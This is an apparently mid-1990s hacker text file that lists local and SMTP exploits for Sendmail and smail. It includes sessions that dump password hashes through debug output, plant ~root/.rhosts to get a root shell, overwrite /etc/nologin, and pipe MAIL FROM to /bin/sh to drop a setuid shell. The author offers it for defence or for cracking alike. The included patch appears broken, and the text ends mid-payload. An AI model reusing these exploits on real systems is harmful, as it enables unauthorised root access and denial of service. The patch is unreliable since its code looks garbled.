from Hacknet, Postmaster@hacknet.demon.co.uk Introduction and Legal Ramble This is written for anyone thats interested in learning about the many Security holes that are resident in many versions of Sendmail. I do not care if you use it to protect your system against others, or crack other ppls systems...just don't involve me in it. I wrote it to collate all the information on sendmail into one list for convience and perhaps it will help some people. I would like to thank the unknown person who started this off long time ago.... This paper is (c) 1995, however I do not object, to you including any of these in a FAQ, printed magazine, book etc... just mail me first so I known where it's distributed *:^) Have you spotted a mistake or anything I could add? Then just add your own stuff and put yourself down on the credits and mail it me :) Note: This is v.01b so there is bound to be mistakes and there are a lot of other stuff to add as well....and expand it to include FTP daemon bugs? I am extremely busy..and am only releasing it due to popular demand. OH, please tell me what versions these work on! Bug #1 Sendmail Version affected: 3.1.28, any more ? SYNOPSIS Use of ~/.forward and debug lets a local user read any file on the system. EXAMPLE OF EXPLOITATION Contrary to popular belief, adding -smtp_debup to your smail config file will not prevent this bug from occuring. It will just prevent exploitation via the smtp port. We can just do this.... user@psyops ~> smail -bs -v20 expand_string($primary_name Smail$version ready for mail on $date,(null), (null)) called expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15 PDT 220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15 PDT expn user [same text as before] expand_string(~/.forward, /home/user, user) called expand_string returns /home/user/.forward dtd_forwardfile: opening forward file /home/user/.forward [more of same text] read 890 bytes director dotforward: matched user, forwarded to root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7::: bin:*:8000:0:99999:7::: daemon:*:8000:0:99999:7::: nobody:*:8000:0:99999:7::: user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7::: [.....] process_field: entry We have a group We have a group process_field: error: recursive address group 550 user ... not matched quit 221 psyops.warez.mil closing connection To fix this, you should get rid of the -d and -v options for smail as well as adding -smtp_debug to your config file. Bug #2 Sendmail Version affected: 3.1.28, any more ? SYNOPSIS Smail called with the -D flag will allow you to create and append to any file on the system. EXAMPLE OF EXPLOITATION user@psyops ~> cat > ~/.forward localhost user ^D user@psyops ~> smail -bs -D ~root/.rhosts -v20 220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12 :23 PDT expn user 250 user quit 221 psyops.warez.mil closing connection user@psyops ~> rsh -l root localhost tcsh\ -i Warning: no access to tty (Bad file number). Thus no job control in this shell. # id uid=3D0(root) gid=3D0(root) Patch this by removing the -D option from smail. I received the following patch recently. I haven't tested it, so use at your own risk. *** Omain.c Wed Mar 11 12:33:18 1993 --- main.c Wed Mar 11 12:59:54 1993 *************** *** 436,458 **** } - /* - * change error file to debugging file from -D option, if any - */ - - if (arg_debug_file) { - new_errfile =3D fopen(arg_debug_file, "a"); - if (new_errfile =3D=3D NULL) { - write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n", - arg_debug_file, strerrno(errno)); - arg_debug_file =3D NULL; - } else { - errfile =3D new_errfile; - fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n", - program, (long)getpid()); - } - } /* * read in the transport, router and director files, if needed * * NOTE: if queue_only is FALSE and mode is DELIVER_MAIL, --- 436,441 ---- *************** *** 525,530 **** --- 508,537 ---- if (prog_euid !=3D REQUIRED_EUID) queue_only =3D TRUE; #endif + /* + * change error file to debugging file from -D option, if any + * + * JMJ: Change location of this fragment to below the setuid/setgid + * calls to allow for use of fopen_as_user() instead of just + * fopen(). + * + * Side effect: -D now requires full pathname to debug file + */ + + if (arg_debug_file) { + new_errfile =3D fopen_as_user(arg_debug_file, "a", 1, real_uid, + prog_egid, 0600); + write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n", + arg_debug_file, strerrno(errno)); + arg_debug_file =3D NULL; + } else { + errfile =3D new_errfile; + fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n", + program, (long)getpid()); + } + } /* * error processing can be other than TERMINAL only for Bug #3 Sendmail Version affected: ? SYNOPSIS Files specified in ~/.forward can be created in any directory, regardless of it's permissions. (File is still owned by mailbox owner, however.) EXAMPLE OF EXPLOITATION user@psyops ~> echo "/etc/nologin" > ~/.forward user@psyops ~> mail -r root user < /dev/null user@psyops ~> echo "Site shutdown due to smail lameness" >! /etc/no= login user@psyops ~> rlogin localhost Site shutdown due to smail lameness rlogin: connection closed. Plug up this hole by adding 'check_path' to the following part of your /usr/lib/smail/transports file: [...] # file - deliver mail to files # # This is used implicitly when smail encounters addresses which begin with # a slash or squiggle character, such as "/usr/info/list_messages" or # perhaps "~/Mail/inbox". file: driver =3D appendfile, return_path, local, from, unix_from_hack; file =3D $user, # file is taken from address append_as_user, # use user-id associated with address expand_user, # expand ~ and $ within address check_path, #<--add this line suffix =3D "\n", mode =3D 0644 [....] BUG #4 Version affected: 5.65? from CSC FAQ: A SAMPLE EXPLOITATION A sample session follows. ---cut here [panix!jhawk] |% telnet panix.com 25 Trying 198.7.0.2 ... Connected to panix.com. Escape character is '^]'. 220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13 -0500 HELO 250 Hello panix.com, why do you call yourself ? MAIL FROM: |/usr/ucb/tail|/usr/bin/sh 250 |/usr/ucb/tail|/usr/bin/sh... Sender ok RCPT TO: root 250 root... Recipient ok DATA 354 Enter mail, end with @.@ on a line by itself From: jhawk"panix.com (John Hawkinson) To: jhawk"panix.com (John Hawkinson) Return-Receipt-To: |foobar Subject: This is a large hole in the ground. X-Disclaimer: We take no responsibility for what might happen Hi there. Wanna play ball? #!/bin/sh #The above line is just in case :-) echo This is a Serious Bug > /tmp/bug echo id reports: >> /tmp/bug /usr/bin/id >> /tmp/bug echo Fixing this would be good >> /tmp/bug cp /bin/sh /tmp/bugshell chmod u+s /tmp/bugshell echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug chmod ugo+rx /tmp/bugshell